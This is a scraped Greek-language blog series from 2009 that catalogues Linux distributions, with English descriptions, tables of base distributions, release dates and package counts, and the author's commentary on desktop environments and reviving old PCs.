http://blogs.msdn.com/interoperability/archive/2010/04/19/sql-server-driver-for-php-2-0-ctp-adds-php-s-pdo-style-data-access-for-sql-server.aspx
http://blogs.msdn.com/sqlphp/default.aspx

Read more...
6 comments
1205 views

Διανομές Linux (τα άπαντα) - Part 4

By Blackman, October 8, 2009

Συνολική Λίστα και πληροφορίες

Παρακάτω μπορείτε να δείτε την κάθε διανομή με μία σχετική περιγραφή που μπορεί να σας βοηθήσει στην τελική επιλογή.

<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" />

Distribution

Description

64 Studio

Attempts to specialize in audio and video production on x86-64 workstations.

AbulÉdu

French. Designed for data processing in educational establishments.

AGNULA

Former DeMuDi for multimedia production

Baltix

Ubuntu based distribution for Lithuanian and Latvian people. Supported languages are Lithuanian, Latvian, Estonian, Russian, English, Norwegian and other around Baltic region. Main language is Lithuanian.

BeatrIX

A compact distribution from the Czech Republic that focuses on providing a user-friendly desktop environment.

Behördendesktop

A Debian-based public Linux distribution developed by the German Federal Office for Information Security.

Corel Linux

Commercial. Short-lived desktop distribution, bought by Xandros Linux.

Damn Small Linux

A desktop Linux distribution designed to be extremely lightweight and run on less powerful hardware.

Dreamlinux

A Brazilian Linux distribution.

Elive

A Live CD and Distribution featuring Enlightenment as the only window manager. Aims to be intuitive and easy to use.

Finnix

A small system administration Live CD that is available for multiple architectures.

Freespire

A Debian-based, community-driven and -supported project tied to the commercial Linspire distribution.

Gibraltar

Commercial. Router/firewall distribution.

gnuLinEx

A distribution promoted by the government of Extremadura, Spain.

grml

Live CD for system recovery

Hikarunix

A distribution solely for studying and playing the game of Go. Based on Damn Small Linux.

Kanotix

An installable live CD for desktop usage using KDE, focusing on convenient scripts and GUI for ease of use.

Knoppix

The first Live CD (later DVD) version of Debian GNU/Linux.

Kurumin

Earlier, it was a version of the Knoppix distribution, modified with Debian and designed for Brazilian users.

LEAF Project

The Linux Embedded Appliance Framework. A tiny primarily floppy-based distribution for routers, firewalls and other appliances.

LiMux

An ISO 9241 industry workplace certified Linux distribution, deployed at the City of Munich, Germany.

Linspire

Commercial. Desktop-oriented distribution, previously called Lindows. Focuses on a proprietary software application manager obtained via a paid (CNR) subscription. Bought by Xandros Linux.

Maemo

A development platform for hand held devices such as the Nokia N800, N810 and Nokia N900 Internet Tablets and other Linux-based devices.

MEPIS

Focuses on ease of use. Also includes lightweight variant called antiX. antiX is meant to be used on older computers with limited hardware.

Neopwn

Debian based network penetration-testing distribution for mobile phones.

NepaLinux

A Debian and Morphix based distribution focused for desktop usage in Nepali language computing.

Omoikane

A Japanese distribution based on Debian testing.

OpenZaurus

Debian packages and ROM image for the Sharp Zaurus PDA. Replaced by Ångström distribution.

Outernet Server

A modified version of Debian that installs pre-configured and is specifically meant for a High speed multimedia Networks.

Parsix

Optimized for personal computers

Progeny Componentized Linux

Distribution from Progeny Linux Systems which was also founded by Debian founder Ian Murdock.

Pure:dyne

pure:dyne is a Debian based operating system developed to provide media artists with a complete set of tools for realtime audio and video processing.

Rxart

Desktop-oriented distribution. Focused on providing proprietary software.

Sacix

A Debian Pure Blend originally created to support the educational and free software diffusion goals of the Telecentres project of the city of São Paulo, Brazil.

Salgix

Distribution developed and maintained by GMSI (Gemini Microsystems International) for its line of Visual Computing workstations.

Santa Fe Linux

A commercial distribution by New Mexico Software. Discontinued.

sidux

Multilingual desktop-oriented Live CD based on Debian unstable.

Skolelinux

A distribution from Norway. It is provided as a thin client distribution for schools.

Sunwah Linux

A Chinese distribution

Symphony OS

Includes the Mezzo desktop environment. Previous versions were based on Knoppix.

The Linux Router Project

A defunct floppy-based distribution for routers and firewalls. Supplanted by LEAF Project.

Ubuntu

A distribution sponsored by Canonical Ltd as well as receiving major funding from South African Mark Shuttleworth. Aims to offer a complete and polished desktop on a single CD.

Ulteo

Virtual desktop project

UserLinux

Commercial distribution that would have included GNOME. Short-lived.

Xandros Open Circulation Edition

Based on Xandros 3.0 Standard Edition. DVD burning is disabled and CD burning is restricted to a maximum speed of 4X.

Xebian

For the Xbox home gaming console.

Feather Linux

Fits in under 128 MB. It boots from either a CD or a USB flash drive. Uses Knoppix-based hardware detection and the Fluxbox window manager.

Kaella

The French translation of Knoppix.

Morphix

A Live CD distribution with different flavours, including GNOME. Used as a base for many other custom live distribution such as Clusterix, PHLAK or Gnix.

Musix

A Knoppix/Debian based distribution, intended for music production, graphic design, audio, video editing, and other tasks. It is built with only free software.

PHLAK

A Live security distribution based on Morphix.

Ubuntu Server Edition

An official derivative made for use in servers. Ubuntu Server handles mail, controls printers, acts as a fileserver, can host LAMP and more.

Kubuntu

An official derivative of Ubuntu using KDE instead of the GNOME which is used by default in Ubuntu.

Xubuntu

An official derivative of Ubuntu using Xfce. Xubuntu is intended for use on less-powerful computers or those who seek a highly efficient desktop environment on faster systems[2], and uses mostly GTK+ applications.

Edubuntu

A complete Linux-based operating system targeted for primary and secondary education. It is freely available with community based support. The Edubuntu community is built on the ideas enshrined in the Edubuntu Manifesto: that software, especially for education, should be available free of charge and that software tools should be usable by people in their local language and despite any disabilities. Since version 8.04, Edubuntu has now been named Ubuntu Education Edition and has been made as an add-on for the Ubuntu operating system.[3]

Gobuntu

Gobuntu was an official derivative of the Ubuntu operating system, aiming to provide a distribution consisting entirely of free software. It was officially announced by Mark Shuttleworth on July 10, 2007, and daily builds of Gobuntu 7.10 began to be publicly released. The project ended around the release of 8.04 and has since merged into mainline Ubuntu as a 'free software' option.

Ubuntu JeOS (pronounced as "juice")

Described as "an efficient variant [...] configured specifically for virtual appliances".[4]

Ubuntu Mobile

An embedded operating system designed for use on mobile devices. The operating system will use Hildon from maemo as its graphical frontend.

Ubuntu Netbook Remix[5]

Released in 2008,[6] Netbook Remix is an official derivative of Ubuntu designed for netbooks using the Intel Atom processor.

Ubuntu Studio

An Ubuntu flavor providing the best open-source applications for multimedia creation aimed at the audio, video and graphic enthusiast or professional. It can either be installed by DVD or "upgraded" from Ubuntu using packages.

Mythbuntu

provides an Ubuntu based and MythTV based distribution that is easy to configure, maintain, and use.

BackTrack

Developed by Remote Exploit and designed for penetration testing.

Buddhabuntu

Ubuntu based distribution for Buddhists to complement Ubuntu Christian Edition and Muslim Editions

BlankOn

Ubuntu based distribution for users in Indonesia.

Buildix

An Ubuntu-based Linux distribution, developed by Global IT professional services firm, ThoughtWorks. For agile developers.

CrunchBang Linux

An Ubuntu based distribution featuring the lightweight Openbox window manager and GTK+ applications developed from a minimal Ubuntu install and has been designed to offer a good balance of speed and functionality.

eBox

Router/Firewall and NAS/PDC

Eeebuntu

Specifically for the Eee PC range of netbooks

Fluxbuntu

Light-weight and featuring the Fluxbox window manager

gNewSense

Designed for users who wish to use only free software. It is officially sponsored and recommended by the Free Software Foundation. The project has also produced a set of scripts that allow anyone to create a free distribution.

Goobuntu

An Ubuntu-based distribution used internally by Google.

gOS

Uses the GNOME desktop environment with user interface enhancements to make it work more like Mac OS X, it also features Google Apps, Picasa, Google Gadgets and other web-based applications, and comes with Wine 1.0 pre-installed

Guadalinex

Ubuntu-based distribution promoted by the local government of Andalucia, Spain, for home users and schools (cf. EduLinux, Skolelinux).

Hiweed

Chinese Linux distribution, based on Ubuntu. Its features include preconfigured Chinese applications, such as Chinese (simplified) input method, Chinese-English and English-Chinese dictionaries, and Chinese (simplified) true-type fonts.

HP Mi (MIE)

Based on Ubuntu 8.04 LTS, designed by Canonical and HP for use on the HP Mini 1000 and 110 series netbooks.[7]

Impi Linux

South African and focuses on the enterprise and government sector.

Kuki Linux

Lightweight Ubuntu-based Linux distribution founded by João Ferro, built to be a replacement for the Linpus Linux Lite distribution on the Acer Aspire One.

Linux4One

Based on Ubuntu, specially designed to work on the Acer Aspire One series

Linux Mint

Linux Mint synchronizes its release-cycle with Ubuntu's, and is tailored to user-friendliness for desktop users.

LinuxMCE (Linux Media Center Edition)

Kubuntu based distribution that provides in-depth HTPC functionality as well as home automation.

LinuxTLE

A Thai Linux distribution.

LliureX

A distribution by the Generalitat Valenciana

LOUD (LCSEE Optimized Ubuntu Distribution)

An Ubuntu distribution used at West Virginia University. It contains several specialized educational packages as well as its own themes and login manager.

MAX

Stands for MAdrid LinuX.

Molinux

Ubuntu based initiative to introduce the Castile-La Mancha community in Spain to the information society.

Moon OS

Moon OS uses the Enlightenment window manager and also has an LXDE version, and is based on the LTS release.

Mundus OS

An unofficial derivative of Ubuntu

nUbuntu or Network Ubuntu

Based on Ubuntu. Available as a Live CD and Full Install with tools needed for penetration-testing servers and networks.

OpenGEU

Ubuntu based distribution with Enlightenment window manager, previously known as Geubuntu.

Poseidon Linux

For academic and scientific use. Based on Ubuntu, but enhanced by e.g. GIS/maps, numerical modelling, 2D/3D/4D visualization, statistics, tools for creating simple and complex graphics, programming languages.

PSUbuntu

Ubuntu distribution intended for the PlayStation 3.

Sabily

Ubuntu based distribution for Muslims (formerly Ubuntu Muslim Edition).

Spri

Lightweight Ubuntu derivative replacing GNOME desktop environment with lightweight IceWM window manager. Designed for ageing and low powered computer hardware.

Super OS (formerly: Super Ubuntu)

Aiming to provide an ‘Out of the Box’ experience, containing various enhancements over Ubuntu.

Trisquel

Created in Galicia (Spain). It has support for old PCs, includes a 3D desktop with Compiz.

TurnKey Linux

Open source project developing a family of free, Ubuntu-based appliances optimized for ease of use in server-type usage scenarios.

Tuquito

Created in Argentina.

U-lite

Has the main goal to be very light consuming hardware resources. The last version uses the LXDE desktop environment. It was previously called Ubuntulite.

Ultimate Edition

Formerly Ubuntu Ultimate, it is based on Ubuntu and contains various software not included in the official Ubuntu repositories.

XBMC Live

An embedded operating system with XBMC Media Center designed to make any computer into a dedicated media center appliance.

UserOS

A series of operating systems made by PC User, based on either Ubuntu or Xubuntu, there are 4 releases.

Calculate Linux

Calculate Linux is a family of distributions.

Flash Linux

Customized to fit on a 256 MB flash drive

Gentoox

An adaptation of Gentoo for the Xbox.

iloog

For academic/student usage.

Knopperdisk

A new distribution aimed at USB sticks.

Kororaa

Aimed at easy installation of a Gentoo system by using install scripts instead of manual configuration.

Navyn OS

A Polish distribution focused on security

Pentoo

Penetration-testing Live CD

Sabayon Linux

An installable Live DVD with multiple desktop environments. Uses a customized version of Red Hat's Anaconda Installer. Includes a Media Center application.

SystemRescueCD

System rescue Live CD version of Gentoo.

Tin Hat Linux

Based on hardened Gentoo

Ututo

Made in Argentina

VidaLinux

Uses Anaconda as its installer.

Arch Linux

An i686- and x86-64-optimized distribution targeted at experienced users. Arch runs on a rolling release system and uses the pacman utility for package management.

DeLi Linux

A desktop based mini distribution with office suite, web browser and other graphical programs to run on a 486. Built from scratch with some influences from Slackware and CRUX.

Frugalware

A general purpose Linux distribution designed for intermediate users. Has some influences from Slackware, and uses the Pacman package manager.

LinHES

Based on Arch Linux since version R6.[8] Specialized distribution for easy setup of the MythTV PVR software.

Maryan Linux

Will be based on Arch Linux in the next release candidate (Codename Bulnesia). Uses Enlightenment as its default window manager, also has Fluxbox and Pekwm ready to use. It is aimed at users migrating from Microsoft Windows.

aLinux

A distribution for home use designed to be equivalent to Windows XP Home (formerly known as Peanut Linux). Discontinued.

ALT Linux

Several distributions including Master, Compact, and Junior. Provides support for Cyrillic languages.[9]

Ark Linux

A distribution focused on ease of use and ease of learning.

Caldera OpenLinux

Caldera bought SCO then took the SCO name and no longer produces a Linux distribution. Last release: 3.1.1 - Jan. 30, 2002

cAos Linux

A general purpose distribution. Designed to have low overhead, run on older hardware, and be easily customizable.

PLD Linux

Fedora

Community-supported distribution sponsored by Red Hat. It usually features cutting-edge Linux technologies.

Linkat

A distribution promoted by the government of Catalonia, Spain.

Lycoris Desktop/LX

Mandriva Linux

Easy to use system through its unique Control Center.

Red Hat Linux

Split into Fedora Core and Red Hat Enterprise Linux. The last official release was Red Hat Linux 9 in March 2003.

SUSE Linux

A desktop-oriented Linux distribution by Novell, Inc., popular in Europe and having Eval versions.

·         openSUSE - A community-developed branch, sponsored by Novell. It maintains a strict policy of ensuring all code in the standard installs will be from Free/Libre/Open-Source Software solutions, including Linux kernel Modules. Novell's enterprise Linux products are all based on the codebase that comes out of the openSUSE project.

·         SUSE Linux Enterprise Server - A server-oriented Linux distribution supplied by Novell, Inc. and targeted at the business market.

·         SUSE Linux Enterprise Desktop (previously branded Novell Linux Desktop) - A desktop-oriented Linux distribution supplied by Novell, Inc. and targeted at the enterprise market.

·         SUSE Linux Enterprise Real Time - A specialized version of the SUSE distribution from Novell designed to support low latency for time critical operations.

Turbolinux

Based on Red Hat Linux.

Vine Linux

A Japanese distribution based on Red Hat Linux.

YOPER

A desktop distribution from New Zealand that focuses on optimizing system performance for workstation use.

Aurora SPARC Linux

For Sun's SPARC architecture

Berry Linux

A medium-sized Fedora-based distribution that provides support in Japanese and English.

BLAG Linux and GNU

Made by the Brixton Linux Action Group.

EduLinux

For educational purposes (cf. Guadalinex, Skolelinux)

EnGarde Secure Linux

Server-only distribution designed to be secure.[10]

K12LTSP

A distribution for educational purpose. Comes with LTSP support.

Linpus Linux

Focused on the Chinese market, along with Linpus Lite focused on the netbook market.

Moblin

Built around the Intel Atom processor

MythDora

Specialized distribution for easy setup of the MythTV PVR software, similar to KnoppMyth, based on Fedora.

Ojuba Linux

Focused on providing the best Arabic support, as well as some Islamic tools such as Hijra (Hijri calendar) and Minbar (prayer time indicator).

Red Hat Enterprise Linux

Red Hat's officially supported distribution. Meant for enterprise use.

Russian Fedora Remix

A remix of Fedora.

Simplis

Simplis (formerly Vixta) is a distribution that tries to emulate the appearance of Windows Vista. It is based on KDE.

Trustix

A distribution focused on security.[11]

Yellow Dog Linux

For the PowerPC platform.

Asianux

A distribution co-developed between Red Flag Software Co., Ltd., Miracle Linux Corp. and Haansoft, INC., focused on Chinese, Japanese and Korean supports.

CentOS

Community-supported distribution that aims to be compatible with Red Hat Enterprise Linux without the inclusion of proprietary software.

ClarkConnect

Small Business Server. File, Print, Messaging, UTM, VPN.

EVEREST Linux

Based on Red Flag Linux. Provides support for the Loongson architecture.

Fermi Linux LTS

Based on Scientific Linux.[12]

Lineox

Forked from Red Hat Enterprise Linux 3. Discontinued.[citation needed]

Miracle Linux

Developed by Japanese software vendor Miracle Linux Co., Ltd

Oracle Enterprise Linux

Supported by Oracle. Aims to be fully compatible with Red Hat Enterprise Linux.

Red Flag Linux

A distribution developed in China and optimized for the Chinese market. Based on Asianux.

Rocks Cluster Distribution

A distribution for building a High-Performance Computing computer cluster, with a recent release supporting Cloud computing. It is based on Red Hat Enterprise Linux but with extensions to support large multi-node heterogeneous systems for clusters (HPC), Cloud, and Data Warehousing (in development).

Scientific Linux

A distribution co-developed by Fermi National Accelerator Laboratory and the European Organization for Nuclear Research (CERN), which aims to be compatible with and based on Red Hat Enterprise Linux.

SME Server

Based on CentOS and targeting Small and Medium Enterprises.

TrixBox

Based on CentOS.

White Box Enterprise Linux

A distribution designed to be compatible with Red Hat Enterprise Linux. Discontinued.

Annvix

A security-focused server distribution. Originally based on Mandrake 9.2 but has diverged a lot. Discontinued.

Caixa Mágica

A Portuguese distribution.

MCNLive

A Mandriva-based distribution designed to run from CD or USB Flash Drive, focused on multimedia, internet, graphics.

PCLinuxOS

A Live CD distribution. Originally based on Mandrake 9.2. Later rebased on Mandriva 2007.

Trinity Rescue Kit

Aimed specifically at offline operations for Windows and Linux systems such as rescue, repair, password resets and disk cloning

Granular Linux

Based on PCLinuxOS and features two desktop environments - KDE & Enlightenment

Karoshi

A PCLinuxOS-based distribution designed for use in schools.

TinyMe

A lightweight distribution based on PCLinuxOS

Austrumi

An 86 MB bootable live CD

BasicLinux

A mini Linux designed to run in old PCs (386). Has a certain degree of compatibility with Slackware packages.

Draco GNU/Linux

A distribution based on Slackware[13][citation needed] that uses pkgsrc for package management.

Fortress Linux

Fortress Linux is an extreme secure and user-friendly Linux distribution that is build from scratch with some influences from Slackware (pkg), Hardened Linux From Scratch, Ubuntu, NetBSD etc and it comes with a powerful management tool, USB / flashcard key authorization and a stripped-down / Live version. Designed for modern personal computers, laptops, embedded devices and servers.

GoblinX

A live CD that features multiple customizable desktop environments.

HostGIS

HostGIS Linux is a Slackware based distribution specifically made for handling GIS information.

KateOS

A desktop distribution aimed at intermediate users. It uses Xfce as its default desktop environment.

MuLinux

Floppy-based distribution with replaceable modules.

NimbleX

Completely customizable through the NimbleX website.

Recovery Is Possible

Live CD for system maintenance and recovery.[14]

Sentry Firewall

A firewall, server or intrusion detection system distribution.

Slackintosh

An unofficial port of Slackware to the PowerPC architecture.

Slamd64

An unofficial port of Slackware to the x86-64 architecture.

SLAX

A very popular live CD which aims to provide a complete desktop for general use. Permanent installation of SLAX is not recommended or supported; it is designed for "live" use only.

STUX

Live CD

Topologilinux

Designed to run from within Microsoft Windows, Topologilinux can be installed without any changes to the user's hard disk.

VectorLinux

A lightweight distribution designed to be easy to use even for new users. Generally considered well-suited for older hardware.

Wolvix

A desktop-oriented Linux distribution based on Slackware, mainly targeted at home users, featuring Xfce.

Zenwalk Linux

Originally a minimal version of Slackware, Zenwalk has evolved into a very different operating system; however, compatibility with Slackware is still maintained.

ZipSlack

A lightweight and portable version of Slackware

DAVIX

A live CD for data analysis and visualization.

DNALinux

A small distribution designed for running bioinformatics software, including BLAST and EMBOSS.

SLAMPP

Designed to be used on a home server.

Billix

A live CD or live USB system administration toolkit and multi-boot distribution with the ability to install any of the included distributions.

Coyote Linux

Router/firewall distribution.

CRUX

CRUX is a lightweight, i686-optimized distribution targeted at experienced users. The focus is "keep it simple", which is reflected in a simple tar.gz-based package system, BSD-style initscripts, and a relatively small collection of trimmed packages

DD-WRT

Embedded firewall distribution.

Devil-Linux

Router/firewall/server distribution running from CD or USB. Configuration held on USB or floppy disk.

DSLinux

Version of Linux designed for the Nintendo DS.

dyne:bolic

Live CD geared toward multimedia (audio and video) production, but comes with other non-media specific application (eg: word processor, desktop publisher).

Endian Firewall

Specializes in Routing/Firewalling and Unified Threat Management.

Familiar Linux

Distribution for iPAQ handhelds.

Fli4l

a single floppy ISDN, DSL and Ethernet-Router.

Foresight Linux

A distribution built around the Conary package manager.

FREESCO

A free replacement for proprietary routers supporting up to 10 network cards and up to 10 modems.

GeeXboX

Live CD media center distribution, mainly to play special-encoded video files (eg: .ogg, XVID) on home theater.

GoboLinux

An alternative distribution which redefines the file system hierarchy by installing everything belonging to one application in one folder under /Programs, and using symlinks from /System and its subfolders to point to the proper files.

IPCop

Router/firewall distribution.

iPodLinux

Embedded Linux firmware for the Apple iPod based on the µCLinux kernel.

Jlime

Distribution for the HP Jornada 6xx and 7xx and NEC MobilePro 900(c) handhelds.

KaeilOS

Embedded Linux distribution

LinuxConsole

An independently developed distribution focusing heavily on gaming and multimedia.

Lunar Linux

A source code-based distribution descended from Sorcerer GNU/Linux.

MCC Interim Linux

MCC Interim Linux, possibly the first Linux distribution. Created by the Manchester Computing Centre in February 1992.

Microcore Linux

Small (6 MB), similar to Tiny Core Linux but with no GUI

MkLinux

A legacy distribution for PowerPC systems that runs the Linux kernel as a server on top of the Mach microkernel.

Mobilinux

By Montavista for smartphones.

MontaVista Linux

Embedded systems distribution by MontaVista Software.

NASLite

a floppy-based Linux designed to turn an old computer into a simple Network Attached Storage device.

Nitix

Developed by Net Integration Technologies Inc., Nitix claims to be the first autonomic Linux-based server operating system.

OpenWrt

Embedded firewall distribution.

Pardus

Developed by Turkish National Research Institute of Electronics and Cryptology. It uses PISI as package manager, COMAR as configuration framework.

PS2 Linux

Sony Computer Entertainment distribution released officially for the PlayStation 2 video game console.

Puppy Linux

A mini distribution which runs well under low-end PCs - even under 32 MB RAM. Includes Slackware 12 support (since version 3).

rPath

A distribution built around the Conary package manager.

SliTaz GNU/Linux

A small desktop distribution. The ISO is under 30 MB; runs entirely in RAM; uses its own tazpkg package system.

Smallfoot

Developed by the Santa Cruz Operation ( SCO UNIX / SCO Group ), formerly Caldera.

SmoothWall

Router/firewall distribution.

Softlanding Linux System

One of the earliest distributions, developed from 1992-1994; Slackware was originally based on it.

Sorcerer

A source code-based distribution.

Source Mage GNU/Linux

A source code-based distribution, descended from Sorcerer.

Thinstation

Thin client distribution supporting all major connectivity protocols.

Tinfoil Hat Linux

Bootable floppy distribution focusing on extreme security

Tiny Core Linux

Tiny Core Linux is a minimalist (around 10 MB) Linux system focusing on providing a base system with BusyBox, FLTK and other minimalist software.

tomsrtbt

Root boot disk.

UHU-Linux

xPUD

Small distribution, aimed at being simple and usable. Features "plate" interface[clarification needed]

Yggdrasil Linux/GNU/X

One of the oldest Linux distributions, not updated since 1995.

Φυσικά όλα αυτά μπορούν να συνδιαστούν με συστήματα Microsoft, με τρόπους που έχουν γραφτεί σε αυτό το Blog.

Για να έχετε πλήρη εικόνα το πως θα μπορέσετε να λειτουργήσετε ένα linux σύστημα με τα υπόλοιπ windows συστήμα τα που έχετε, απλά ανατρέξτε στα παρακάτω

http://autoexec.gr/blogs/blackman/archive/2009/01/28/authenicating-linux-active-directory-domain.aspx

http://autoexec.gr/blogs/blackman/archive/2009/01/28/12787.aspx

http://autoexec.gr/blogs/blackman/archive/2009/02/03/domain-controller-samba-microsoft.aspx

http://autoexec.gr/blogs/blackman/archive/2009/05/08/nas-freenas-linux.aspx

http://autoexec.gr/blogs/blackman/archive/2009/06/22/group-policies-mixed-environments-windows-linux-mac-os.aspx

http://autoexec.gr/blogs/blackman/archive/2009/07/05/interoperability-sharepoint.aspx

http://autoexec.gr/blogs/blackman/archive/2009/02/01/windows-vista-windows-2008-samba-interoperability-issues-how-to.aspx

κύρια πηγή: Wikipedia

Read more...
1 comment
598 views

Διανομές Linux (τα άπαντα) - Part 3

By Blackman, October 8, 2009

<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" />

Special Distributions

Για το τέλος άφησα κάποιες πιο εξειδικευμένες διανομές.

Distribution

Base distribution

Latest release date

Purpose

Kuki Linux

Ubuntu

?

Acer Aspire One

Edubuntu

Debian

03/07/2008

computer lab

SYS

Slackware

2009-06-02[7]

desktop, development, server

MontaVista Linux

Debian

2007-03-?

embedded systems

NexusWare Core

Debian and others

02/02/2008

embedded systems

KnoppMyth

Debian, Knoppix

09/09/2007

Live Frontend, Desktop

Mutagenix

Slackware

16/08/2007

rescue, general purpose

Paipix

Debian

17/10/2007

science

Scientific Linux

RHL/RHEL

28/06/2008

science

Βλέπουμε το Kuki Linux που διαμορφώθηκε αποκλειστικά για το Acer Aspire One notebooks, αλλά και άλλα ενδιαφέροντα όπως πχ το Edubuntu που σκοπός του είναι να προσφέρει ένα computer lab.Το Mutagenix είναι μία διανομή που έχω ακούσει καλά λόγια, αλλά δεν έχω δοκιμάσει (ακόμα). Ενώ το Scientific Linux ίσως τραβήξει το ενδιαφέρον πολλών αν μάθουν ότι το δημιούργησε η ομάδα του CERN.

Πυρήνας του συστήματος (Linux KERNEL)

Ένα από τα χαρακτηριστικά που κάνει να ξεχωρίζει μία διανομή από μία άλλη έχει να κάνει με την έκδοση του πυρήνα της εκάστοτε διανομής. Ο πυρήνας κάνει το σύστημα σταθερό ή ασταθές, για αυτό πριν προχωρήσετε σε οποιαδήποτε λύση ρίξτε μία ματιά στην έκδοση του kernel που χρησιμοποιεί.

File System

Στο linux το κλασσικό σύστημα αρχείων που μπορεί κάποιος να βρει είναι το ext3 . Ενώ με την χρήση του SAMBA μπορείτε να έχετε τόσο πρόσβαση σε fat ή ntfs partitions, ενώ ταυτόχρονα να μπορείτε να κάνετε και authentication σε ένα δίκτυο Microsoft.

----------------

Τι μπορείτε να βρείτε σε σύνολο πακέτων-προγραμμάτων σε κάθε διανομή; Δείτε παρακάτω ενδεικτικά.

Distribution
Approximate number of pre-compiled packages

ALT Linux
8300[38]

BLAG
10000 [39]

Mythbuntu
26000

Ubuntu,Kubuntu,Xubuntu
26000

Debian
25113

CrunchBang Linux
23000

Dreamlinux
23000

Linux Mint
23000

sidux
23000

openSUSE
22000

SUSE
22000

Alinex
20300

Elive
20000

Mandriva Linux
20000

MEPIS
20000

Caixa Mágica
16000

Arch Linux
15000

Foresight Linux
15000

Sabayon Linux
12000

Fedora
8000

SYS
6000

Source Mage GNU/Linux
5514

PCLinuxOS
5025

Rxart
5000

Ututo
5000

Ark Linux
4000

Knoppix
3600

Lunar
3120

Aurox
3000

Frugalware
3000

Red Hat Enterprise Linux
3000

QiLinux
2500

Linspire
2200

Slax
2050

GoboLinux
2000

Paipix
2000

Yoper
2000

CentOS
1660

Pardus
1600

Pie Box Enterprise Linux
1500

SliTaz GNU/Linux
1400

Musix GNU+Linux
1300

aLinux
1200

Kanotix
1200

CRUX
1155

DeMuDi
875

Damn Small Linux
610

SMS - Slack Mini Server
600

Slackware
544

EnGarde Secure Linux
500

NimbleX
500

Finnix
350

Puppy
300

gnuLinEx
200

Desktop Light Linux
150

Gentoo
80
Go To Part 4

Read more...
1 comment
527 views

Διανομές Linux (τα άπαντα) - Part 1

By Blackman, October 8, 2009

Πολλοί κατά καιρούς ίσως να έχετε έρθει σε επαφή με κάποια διανομή linux στο παρελθόν. Άλλοι ίσως να αγνοείται το πλήθος των διανομών που μπορεί να υπάρχουν. Οι πιο ψαγμένοι ίσως να έχουν πάντα κοντά τους ένα live cd για ώρα ανάγκης. Αποφάσισα λοιπόν να κάνω ένα αφιέρωμα στις γενικότερες διανομές Linux που μπορεί κάποιος να βρει, το που βασίζονται, αλλά και για τι χρήση προορίζονται.

Πρόσφατα ο Linus Torvalds, δήλωσε ότι το linux πλέον είναι παραφορτωμένο. Αυτό όντως ισχύει καθώς οι περισσότερες διανομές, έχουν εγκατεστημένα πάνω από μία εφαρμογή για κάποια συγκεκριμένη δουλειά. Για παράδειγμα, 2-3 media players, 2-3 browsers κλπ, με σκοπό να επιλέξει ο χρήστης τι τον βολεύει να λειτουργήσει, να έχει εναλλακτικές λύσεις και στην συνέχεια αν θέλει να τις απεγκαταστήσει. Φυσικά οι διανομές πλέον έχουν γίνει πολύ πιο φιλικές προς τον χρήστη, σε αντίθεση αρκετά χρόνια πιο πριν που η γραμμή εντολής ήταν και το δυνατό αλλά συνάμα δύσχρηστο κομμάτι των Unix/Linux συστημάτων.

<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" />

Desktop Distributions

Αρχικά η ανάλυση θα ξεκινήσει από τις διανομές που προορίζονται αποκλειστικά για desktop χρήση.

Distribution

Base distribution

Latest release date

aLinux

Red Hat Linux

08/11/2006

Ark Linux

none

14/05/2008

BLAG

Fedora

2008-07-21 [1]

CrunchBang

Ubuntu

19/01/2009

Desktop Light Linux

none

28/05/2008

Elive

Debian

05/07/2007

gNewSense

Ubuntu (8.04)

14/09/2009

gnuLinEx

Debian

20/06/2006

GoboLinux

none

30/03/2008

gOS

Ubuntu

07/02/2008

Impi Linux

Debian

31/01/2006

Linspire

Debian

10/10/2007

Freespire

Debian/Ubuntu(developing)

30/11/2007

Linux4One

Ubuntu

06/04/2009

Linux Mint

Ubuntu

24/06/2009

NimbleX

Slackware

25/12/2006

Parsix

Kanotix, Debian

05/10/2007

PCLinuxOS

Mandriva

11/03/2009

Sabayon Linux

Gentoo

13/04/2009

sidux

Debian Sid

23/12/2008

SimplyMEPIS

Debian

25/08/2009

Symphony OS

Debian

13/12/2006

Kubuntu

Debian

03/07/2008

Xubuntu

Debian

03/07/2008

Gobuntu

Debian

03/07/2008

VectorLinux

Slackware

17/05/2007

Xandros

Corel Linux

21/06/2006

Kiran Linux

Slackware

19/08/2008

Yellow Dog Linux

Fedora, CentOS

29/06/2009

Satux

Debian

2007[5]

Foresight Linux

rPath

24/11/2008

Σε αυτή την λίστα βρίσκουμε το Xandros, το οποίο γνωρίζετε όσοι έχετε κάποιο Asus EeePC netbook, το Linux Mint μία από τις πιο ευχάριστες και ελαφρές διανομές. Θα σας κάνει εντύπωση το πώς γίνεται να υπάρχουν διανομές όπως το Mint το οποίο βασίζεται στο Ubuntu, ενώ τα Kubuntu, Xubuntu βασίζονται στο Debian. Βασικά η απάντηση είναι απλή. Το Ubuntu είναι μία διανομή βασισμένη στο Debian, από και πέρα οι εκδώσεις Kubuntu, Xubuntu είναι κανονικές διανομές του Ubuntu και ουσιαστικά προέρχονται καθαρά από το Debian, ενώ στις άλλες περιπτώσεις έχουν πάρει το Ubuntu και το έχουν μετατρέψει σε νέα διανομή.

Σίγουρα τώρα θα σας έρχονται και άλλες ερωτήσεις. Τι Kubuntu και Ubuntu και Xubuntu μας λες ρε Blackman; Τι διαφορά μπορεί να έχουν αυτά τουλάχιστον τα τρία μεταξύ τους; Όπως και οι υπόλοιπες διανομές; Η απάντηση έχει να κάνει στο θέμα του user interface πάνω στον οποίο είναι στημένη η κάθε διανομή. Για παράδειγμα το Xubuntu χρησιμοποιεί το Xfce, το οποίο θεωρείται το πλέον ελαφρύ γραφικό περιβάλλον με αποτέλεσμα να δίνει την δυνατότητα χρήσης του συγκεκριμένου λειτουργικού ακόμα και σε πολύ παλιά μηχανήματα, την ίδια στιγμή το Kubuntu χρησιμοποιεί KDE γραφικό περιβάλλον, ενώ η κανονική έκδοση του Ubuntu είναι στημένο σε Gnome.

Πρόταση: Έχετε κάποιον παλιό υπολογιστή και τον έχετε παρατημένο στην άκρη, καθώς δεν σηκώνει ούτε Windows XP; Διαλέξτε μία διανομή η οποία να χρησιμοποιεί Xfce γραφικό περιβάλλον και δώστε ζωή στον υπολογιστή σας. Δεν θα μετανιώσετε για την κίνηση σας αυτή.

General Purpose Distributions

